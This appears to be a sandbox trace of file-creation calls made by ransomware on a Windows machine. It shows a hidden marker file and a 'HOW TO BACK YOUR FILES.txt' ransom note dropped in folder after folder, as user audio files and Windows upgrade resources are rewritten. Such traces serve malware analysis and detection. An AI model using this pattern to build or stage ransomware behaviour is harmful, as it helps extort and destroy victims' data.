Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\r3evlg.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\uTrfomCxIjimUGwk.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\VnEX 9WW6p4i-Twwhx.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\YUIsYjlW9J5Ehao1EkEz.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\5FKUdmKmT3tyICvOkik4.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\PC s _86v5QYC.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\vK1-.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\1uqkkl.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\eevQcTFNQMa.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\VTuFplQwRU7kkKmscw.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\YIH0Q0N.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\9mWokFqz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\hwcompat.txt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\hwexclude.txt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\nxquery.cat desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\nxquery.inf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\dll2\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\dll1\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\2052\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Public\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
